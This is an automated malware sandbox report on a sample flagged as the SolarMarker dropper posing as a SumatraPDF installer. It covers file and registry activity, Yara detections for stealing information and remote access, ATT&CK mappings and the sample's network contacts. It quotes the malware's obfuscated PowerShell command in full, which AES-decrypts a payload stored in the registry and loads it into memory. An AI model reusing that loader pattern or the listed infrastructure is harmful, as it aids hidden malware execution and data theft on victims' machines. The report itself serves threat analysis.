      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
      Source: powershell.exe, 00000011.00000002.22320458549.0000022191FF5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Remove-NetEventVmNetworkAdapter
      Source: powershell.exe, 00000011.00000002.22551399134.00000221AA0DE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlls"U
      Source: powershell.exe, 00000011.00000002.22320458549.0000022191FF5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Add-NetEventVmNetworkAdapter
      Source: powershell.exe, 00000011.00000002.22320458549.0000022191FF5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Get-NetEventVmNetworkAdapter
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exe Process token adjusted: Debug
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeMemory allocated: page read and write | page guardJump to behavior
      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe" -command "$a=new-object system.security.cryptography.aescryptoserviceprovider;$a.key=@([byte]3,173,118,126,231,161,139,192,229,141,204,156,132,100,48,106,235,67,30,141,248,153,154,213,216,50,229,134,16,171,109,238);$a.iv=@([byte]201,234,4,140,115,200,164,199,43,168,227,197,101,4,86,9);$f=(get-itemproperty 'hkcu:\software\classes\rfg1dcnqkaz').'(default)';[reflection.assembly]::load($a.createdecryptor().transformfinalblock($f,0,$f.length));[kemcid76hlg1vs2opa8cqjgckrcqhxczjexlew2lxjrumleqnphpryotm9lbu6vtunojb72jkixzx3sswfgvtdwcsszecxsogc.k71mr3w83p167odlfs1wny2afqytql9bufz4zvpo0mceu64ndeff]::keqmis3ck5upwc0wnjhou0kdkh_ib1('cw2tm3bl19p97xcm5ku1reej00x0iviu');
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeProcess created: C:\Users\user\Desktop\sumpdf-installer-x64-bundle.exe "C:\Users\user\Desktop\sumpdf-installer-x64-bundle.exe" Jump to behavior
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershellJump to behavior
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershellJump to behavior
      Source: sumpdf-installer-x64-bundle.exe, 00000007.00000000.17266004670.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe, 00000007.00000002.22279117962.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe.4.drBinary or memory string: Shell_TrayWndKillProcessesUsingInstallation()
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeQueries volume information: C:\Users\user\Desktop\i2wBlKtxrM.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\sumpdf-installer-x64-bundle.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\sumpdf-installer-x64-bundle.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\sumpdf-installer-x64-bundle.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\sumpdf-installer-x64-bundle.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\sumpdf-installer-x64-bundle.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\sumpdf-installer-x64-bundle.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.906.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.906.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.906.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.906.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.906.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.906.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.906.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.906.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.906.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.906.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.906.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.906.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.906.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.906.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.906.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.906.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.906.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.906.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.906.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.906.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.906.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.906.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.906.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.906.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.906.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.906.cat VolumeInformation
      Source: C:\Users\user\Desktop\sumpdf-installer-x64-bundle.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessorJump to behavior
      Source: C:\Users\user\Desktop\sumpdf-installer-x64-bundle.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
      Source: C:\Users\user\Desktop\sumpdf-installer-x64-bundle.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
      Source: C:\Users\user\Desktop\sumpdf-installer-x64-bundle.exeCode function: 7_2_00007FF710E9A0E4 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,7_2_00007FF710E9A0E4

      Stealing of Sensitive Information

      Source: Yara match - File source: i2wBlKtxrM.exe, type: SAMPLE
      Source: Yara match - File source: decrypted.memstr, type: MEMORYSTR

      Remote Access Functionality

      Source: Yara match - File source: i2wBlKtxrM.exe, type: SAMPLE
      Source: Yara match - File source: decrypted.memstr, type: MEMORYSTR
      MITRE ATT&CK Matrix (techniques listed per tactic; the number in parentheses is the count shown next to a matched technique)

      Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
      Execution: Command and Scripting Interpreter (12); Scheduled Task/Job; At (Linux); At (Windows); Cron; Launchd; Scheduled Task
      Persistence: Registry Run Keys / Startup Folder (2); DLL Side-Loading (1); Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items
      Privilege Escalation: Process Injection (12); Registry Run Keys / Startup Folder (2); DLL Side-Loading (1); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items
      Defense Evasion: Masquerading (1); Modify Registry (1); Disable or Modify Tools (1); Virtualization/Sandbox Evasion (131); Process Injection (12); Obfuscated Files or Information (11); DLL Side-Loading (1)
      Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
      Discovery: System Time Discovery (1); Security Software Discovery (111); Process Discovery (2); Virtualization/Sandbox Evasion (131); Application Window Discovery (1); File and Directory Discovery (2); System Information Discovery (23)
      Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
      Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
      Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
      Command and Control: Encrypted Channel (2); Non-Application Layer Protocol (2); Application Layer Protocol (3); Protocol Impersonation; Fallback Channels; Multiband Communication; Commonly Used Port
      Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points
      Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
      Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact
      Behavior Graph (ID: 2476126, Sample: i2wBlKtxrM.exe, Startdate: 14/06/2023, Architecture: WINDOWS, Score: 60)

      Top-level signatures: Malicious sample detected (through community Yara rule); Yara detected SolarMarker; Yara detected SolarMarker Dropper; 4 other signatures
      Top-level DNS/IP: www.sumatrapdfreader.org; sumatra-website.onrender.com; 2 other IPs or domains
      Process tree: i2wBlKtxrM.exe (started) -> powershell.exe (started), powershell.exe (started), sumpdf-installer-x64-bundle.exe (started); powershell.exe (started) -> conhost.exe (started); each of the two child powershell.exe -> conhost.exe (started)
      Network contacts of i2wBlKtxrM.exe: 146.70.104.173 (ports 49828, 49831, 49833; TENET-1ZA, United Kingdom); files2.sumatrapdfreader.org 104.26.8.244 (ports 443, 49827; CLOUDFLARENETUS, United States)
      Network contact of the first child powershell.exe: 82.102.16.41 (ports 49852, 49853, 49854; M247GB, Malta)
      Dropped by i2wBlKtxrM.exe: C:\Users\...\sumpdf-installer-x64-bundle.exe (PE32+)
